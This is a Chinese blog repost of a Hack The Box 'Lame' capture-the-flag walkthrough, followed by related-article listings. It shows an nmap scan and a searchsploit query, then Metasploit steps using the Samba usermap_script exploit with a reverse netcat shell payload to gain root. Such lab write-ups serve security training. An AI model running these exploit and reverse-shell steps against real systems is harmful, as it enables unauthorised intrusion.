HTB: Lame 渗透测试

最新推荐文章于 2023-04-25 18:48:46 发布
最新推荐文章于 2023-04-25 18:48:46 发布
阅读量593 收藏 1
点赞数
文章标签: 测试工具 网络安全 web安全 系统安全 数据挖掘
原文链接:https://www.freebuf.com/articles/web/264461.html
版权

网络安全,web,Kali,渗透测试相关课件,工具,资料

可以关注公众号:“掌控安全课堂

回复:“我想学黑客”即可免费获得

基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines
描述:

注:因为是已经退役的靶机所以现在的ip地址与信息卡中的并不一致。

前言

本次演练使用kali系统按照渗透测试的过程进行操作,首先对该靶机进行探测,获取端口与版本信息根据各个开放端口的版本查找相应的漏洞,并进行利用获取root权限

一、信息收集

1、靶机ip

ip地址为10.129.104.53

2、靶机端口服务

nmap -p- -A -O 10.129.104.53

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

二、漏洞探测与利用

1、漏洞扫描

通过端口扫描发现开放了445端口,使用searchsploit查询是否存在版本漏洞

searchsploit  Samba 3.0.20

发现msf中存在可以利用的脚本

2、漏洞利用

search Username map script
use exploit/multi/samba/usermap_script

根据提示需要设置payload

set payload cmd/unix/reverse_netcat

需要设置:RHOSTS、RPORT 、LHOST、LPORT(默认即可)

3、获取flag

三、总结

该靶机操作简单需要,直接使用msf中集成好的脚本即可,想要加深印象可以查看该漏洞的详细信息,有助于更好的了解

本文作者:一只xiao白, 转载请注明来自FreeBuf.COM

Askshhbs
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB Lame[Hack The Box HTB靶场]writeup系列1
重新启程
02-01 2845
首先祈祷一下SARS病情尽快过去,武汉加油!湖北加油! 为了不给国家添乱,所以我在HTB订阅了VIP,准备搞下Retired Machines的靶机。 目录 0x00 靶场介绍 0x01 扫描端口 0x02 ftp服务 0x03 smb服务 0x00 靶场介绍 我们从第一个lame开始。 如何注册账号,购买vip,网上有大把文章,这里我就不再记录了。 这个系列主要是...
HTB-Lame
qq_53142368的博客
06-30 291
HTB
oscp——HTB—— Lame
王嘟嘟的博客
04-13 590
0x00 前言 vulnhub下载,搞环境搞的人心累,还不如试试HTB~ 难度 入门 1级 (基本没啥难度) 0x01 信息收集 常规扫端口,网太卡了,所以使用先扫常规,然后再进行定点扫描。 0x02 usershell and rootshell 我是做完之后回来写的,这里可以直接拿到两个flag 看到samba,拿msf 看一下版本 use auxiliary/scanner/smb/s...
HTB_Lame_Samba NDay
网络安全学习
02-01 98
HTB_Lame_Samba NDay
htb:破解盒子的演练
01-31
htb 破解盒子的演练
HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
HTB打靶日记:Stocker
01-15
在本文中,我们将深入探讨一个名为“Stocker”的Hack The Box (HTB)靶场案例,这是一次针对Web安全、Linux系统以及JavaScript的渗透测试练习。首先,我们从信息收集开始,这是任何渗透测试的第一步。 使用Nmap进行...
30 天渗透测试练习2.pdf
最新发布
10-06
7. **HackTheBox (HTB) 机器**:HTB是一个在线平台,提供了多种级别的虚拟机,用于提升渗透测试技能。例如Pilgrimage、Topology、PC、Busqueda等,每个机器都有不同的攻防挑战。 8. **基于路由的SSRF(Server-Side ...
vagrant-htb:HackTheBox的Vagrantfile
03-01
流浪汉 Kali流浪者设置(最低) 安装工具 vim 网络工具 python3 解压缩 多路复用器 纳帕 网页壳 ...如果要添加更多,只需编辑Provision / kali.yml文件。...再一次,g,如果您想添加更多,只需将git repo...cd vagrant-htb
HTB_lame-samba cre远程
Allison_的博客
07-01 378
nmap -sC -sV 10.10.10.3 发现存在以下端口21、22、139、445端口,逐步测试后发现139smb存在漏洞 Samba服务对应的端口有139和445等,只要开启这些端口后,主机就可能存在Samba服务远程溢出漏洞 msfconsole方法 使用msfconsole中multi/samba/usermap_script模块,设置攻击目标10.10.10.3,LHOST应该是默认的,run执行后获得服务器权限,执行whoami命令发现其是root权限 得到flag 进
HTB打靶日记:Lame
m0_73998094的博客
12-25 705
HTB打靶日记:Lame
oscp——htb——Lazy
热门推荐
王嘟嘟的博客
06-29 1万+
0x00 前言 0x01 信息收集 0x02 Web
HTB靶机-Lame-WP
灰蜗牛
04-25 977
简介:Tags:Rating: 4.4Skills:扫下IP: 1.ftp 匿名登录ftp查看一下 尝试vsftp对应的漏洞 该漏洞不存在,转向ssh和smb试着爆破一下,没发现可以利用的点。 不用MSF怎么解决呢?试试nmap的nse漏洞脚本,无果 非MSF 信息搜集,寻找历史漏洞确定Samba具体版本 关于smbclient出现NT_STATUS_CONNECTION_DISCONNECTED错误smbclient从4.11开始协议取消了nt1,使用smbv2,所以导致协议不能协商,解决办法如上,通过
hack the box lame渗透过程
nini_boom的博客
05-12 1726
hack the box就不多介绍了。直接上题 1、信息收集 端口扫描 nmap -Pn -sV -sC -A -oN 10.10.10.3.txt 10.10.10.3 参数 作用 -Pn 如果主机禁用了ping请求,那么扫描将不能很好地进行下去。-Pn就是默认主机已经启动,并进行全套的检查工作 -sV 检查服务端的软件版本,可针对不同版本选择payload -sC...
kali渗透测试:【实验2】一次简单的渗透测试实战
qq_38975218的博客
12-05 4635
启动 Kali 容器并进入到 bash 界面里,执行 ping 操作验证网络联通性: # 启动并进入 Kali 容器里的 bash docker run -ti --network host 3f457 bash # 在 Kali 容器中测试虚拟网络连接,使用 Ctrl-C 退出 ping: ping target 在 Kali 容器的 bash 界面里运行以下命令,注意 Nmap 的参数使用: -p:指定扫描的端口范围 -T4:设定 nmap 扫描的时间策略,数字为 0-5,越大越快。扫描的越慢则越
新手教程—Samba渗透远程命令注入漏洞 username map script(CVE-2007-2447 )
星虐
01-10 2410
Smaba 远程shell命令注入 (username map script) 文章目录Smaba 远程shell命令注入 (username map script)一、漏洞描述二、漏洞利用过程二、漏洞实验步骤 一、漏洞描述 漏洞编号 CVE-2007-2447 披露时间 2007-05-14 “username map script”是Samba协议的远程命令注入执行漏洞 漏洞路径 exploit/multi/samba/usermap_script 影响版本 samba 3.0.20-3.0.25
交叉编译并测试lame
突围
06-14 5689
root@ubuntu:/home/zhangbin/project/6-14/lame-3.98.4# ./configure --prefix=/mnt/ZB --host=arm-linux  --with-picconfigure: WARNING: If you wanted to set the --build type, dont use --host.    If a
LAME是最好的MP3编码器
牛八少爷的专栏
07-18 5472
1.LAME简介 LAME是遵循了GNU的MP3编码器,编码高品质MP3的最好和唯一选择。 2.LAME相关网址 LAME官网:http://lame.sourceforge.net/ LAME源码路径:https://sourceforge.net/projects/lame/files/lame/ 3.LAME编译平台 LAME可以在 Windows, DOS, GNU/Li...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值